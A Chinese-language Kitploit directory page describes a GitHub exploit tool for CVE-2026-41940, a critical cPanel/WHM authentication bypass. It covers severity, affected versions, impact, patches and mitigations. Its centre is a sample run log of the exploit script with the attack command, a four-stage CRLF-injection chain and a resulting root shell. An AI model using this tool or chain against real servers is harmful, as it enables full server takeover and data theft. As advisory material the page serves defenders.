Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-41940 — CVE-2026-41940 | Kitploit
工具/GitHubGitHub/0xblackash/cve-2026-41940
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用渗透测试命令与控制红队
GitHub0xblackash/cve-2026-41940

CVE-2026-41940

CVE-2026-41940

查看仓库
144个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

⚠️ CVE-2026-41940 - cPanel 与 WHM 身份验证绕过

ChatGPT Image May 1, 2026, 08_27_37 PM
CVSS 9.8 Critical Actively Exploited

cPanel 与 WHM 中的严重预身份验证绕过


📌 概述

CVE-2026-41940 是一个影响 cPanel 与 WHM 及 WP Squared 的严重身份验证绕过漏洞。

未经身份验证的远程攻击者可完全绕过登录,并获得服务器的完全管理(root/WHM)访问权限。

该漏洞在补丁发布前已被在野积极利用。


🎯 严重性

指标数值
CVSS 3.1 评分9.8(严重)
CVSS 4.0 评分9.3(严重)
攻击向量网络
攻击复杂度低
所需权限无
用户交互无

🛠️ 受影响产品

  • cPanel 与 WHM — 自 11.40 之后至修复前的所有版本
  • WP Squared — 136.1.7 之前的版本

披露时,约有 150 万个 cPanel 实例可能已暴露。


🔥 影响

成功利用该漏洞可使攻击者:

  • 获得完整的 WHM/root 访问权限
  • 接管所有托管的网站和账户
  • 修改服务器配置
  • 窃取敏感数据
  • 部署持久化后门

✅ 以下是成功时的效果(就像你展示的 Eye Security 截图):

如果利用成功,你应该会看到类似这样的输出:

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2026-41940.py -u https://xx.xx.xx.xx:2087 --action shell                      
[sudo] password for kali: 


 ██████╗ ██╗  ██╗██████╗ ██╗      █████╗  ██████╗██╗  ██╗ █████╗ ███████╗██╗  ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║     ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║  ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║     ███████║██║     █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║     ██╔══██║██║     ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║  ██║╚██████╗██║  ██╗██║  ██║███████║██║  ██║
 ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
  CVE-2026-41940 — cPanel & WHM Auth Bypass via CRLF Injection
  4-stage: preauth → CRLF inject → propagate → verify → post-exploit
  Author : Ashraf Zaryouh / @0xBlackash

  Configuration:
   Targets  : 1
   Threads  : 10
   Timeout  : 15s
   Action   : shell

13:41:18 [SCAN] Starting 4-stage exploit chain... https://xx.xx.xx.xx:2087
13:41:19 [INFO] Canonical hostname discovered: server.xxxxxxx.xx
13:41:19 [INFO] Canonical: server.softsms.in
13:41:19 [STEP] Stage 1/4 — Minting preauth session...
13:41:20 [  OK] Stage1: preauth session = :W43DhFApxxxD8Jdw...
13:41:20 [STEP] Stage 2/4 — CRLF injection via Authorization header...
13:41:21 [  OK] Stage2: HTTP 307 → token=/cpsess263xxxx267
13:41:21 [STEP] Stage 3/4 — Firing do_token_denied gadget (raw→cache)...
13:41:22 [  OK] Stage3: HTTP 401 — do_token_denied gadget fired
13:41:22 [STEP] Stage 4/4 — Verifying WHM root access...
13:41:24 [INFO] Stage4: HTTP 200  {"version":"11.86.0.40"}
13:41:24 [PWND] CVE-2026-41940 CONFIRMED — WHM root access!  https://xx.xx.xx.xx:2087
13:41:24 [PWND]   Token    : /cpsess2634xxxx267
13:41:24 [PWND]   Session  : :W43DhFApxxxD8Jdw...
13:41:24 [PWND]   Version  : 11.86.0.40
13:41:24 [PWND]   API URL  : https://xx.xx.xx.xx:2087/cpsess2634xxxx267/json-api/version
13:41:24 [ API] Running post-exploit action: shell

════════════════════════════════════════════════════════════
  WHM Shell — server.xxxxxxx.xx
  Version: CVE-2026-41940 | Auth: CRLF bypass
  Type 'help' for commands, 'exit' to quit
════════════════════════════════════════════════════════════

[email protected] ▶ id
13:41:28 [ API] gethostname → HTTP 500
  uid=0(root) gid=0(root) groups=0(root)
[email protected] ▶ exit
Exiting shell.

══════════════════════════════════════════════════════════════════════
  CVE-2026-41940.py — CVE-2026-41940 Scan Complete
  Time: 13.9s  ·  Targets: 1
──────────────────────────────────────────────────────────────────────

  ⚡ 1 VULNERABLE TARGET(S)

  Target   : https://xx.xx.xx.xx:2087
  Version  : 11.86.0.40
  Token    : /cpsess263xxxx267
  API URL  : https://xx.xx.xx.xx:2087/cpsess2634xxxx267/json-api/version
  Session  : :W43DhFApxxxD8Jdw...
  Evidence : {"version":"11.86.0.40"}

══════════════════════════════════════════════════════════════════════


✅ 已修复版本

补丁于 2026 年 4 月 28 日发布

  • 将 cPanel 与 WHM 更新至最新构建版本
  • 将 WP Squared 更新至 136.1.7 或更高版本

建议立即采取行动


🛡️ 缓解与防护

  • 立即更新至最新版本
  • 阻止对端口 2082、2083、2086、2087 的公共访问
  • 启用 WAF 规则(Cloudflare、ModSecurity 等)
  • 使用 IP 白名单或 VPN 进行管理访问

📚 参考资料

  • NVD - CVE-2026-41940
  • watchTowr Labs - 技术深入剖析
  • cPanel 官方安全公告
  • CISA KEV 目录


以 ❤️ 为安全社区打造

最后更新:2026 年 5 月

下载工具